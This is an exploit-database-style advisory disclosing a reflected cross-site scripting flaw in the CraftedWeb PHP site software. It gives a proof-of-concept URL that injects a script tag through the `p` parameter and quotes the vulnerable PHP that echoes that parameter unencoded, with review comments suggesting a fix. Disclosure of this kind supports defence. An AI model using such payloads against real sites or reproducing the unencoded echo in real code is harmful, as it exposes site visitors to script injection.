# Exploit Title: CraftedWeb Cross Site Scripting
# Google Dork: NA
# Date: 2015-10-06
# Exploit Author: M.r00t3x
# Vendor Homepage: https://github.com/zze/CraftedWeb
# Software Link: https://codeload.github.com/zze/CraftedWeb/zip/master
# Tested on: Windows xp
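Reflected XSS: the value of the `p` query parameter is written back into the response without HTML encoding when it does not match a known page (see the source excerpt below).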
http://127.0.0.1/CraftedWeb-master/index.php?p=</title>1<ScRiPt>alert('xss')</ScRiPt>
Vulnerable source (PHP):
// Builds the page-title text: the site title, then either the matching
// entry name from $GLOBALS['core_pages'] or, failing that, the raw `p`
// request parameter.
// NOTE(review): the leading </title> in the proof-of-concept suggests this
// output lands inside the document's <title> element - confirm in the template.
echo $website_title .' - ';
// Walk the core_pages array with its internal pointer. The loop ends at the
// end of the array, and also early if an element's value is falsy.
while ($page_title = current($GLOBALS['core_pages']))
{
// Loose comparison of the stored file name against "<p>.php".
// $_GET['p'] is read without an isset() check.
if ($page_title == $_GET['p'].'.php')
{
// On a match the array key is printed; that value comes from
// $GLOBALS['core_pages'], not from the request.
echo key($GLOBALS['core_pages']);
$foundPT = true;
}
next($GLOBALS['core_pages']);
}
// $foundPT is only ever set inside the match branch above, so this fallback
// runs for every `p` value that has no core_pages entry.
if(!isset($foundPT))
// XSS sink: request data is echoed with no output encoding (ucfirst() only
// upper-cases the first character). Encode for the HTML context before
// output, e.g. htmlspecialchars($_GET['p'], ENT_QUOTES, 'UTF-8'), or reject
// values that are not known page names.
echo ucfirst($_GET['p']);
facebook page : wwww.fb.com/algeria.anon
Thanks : M.tucX - MrDz -MadGuko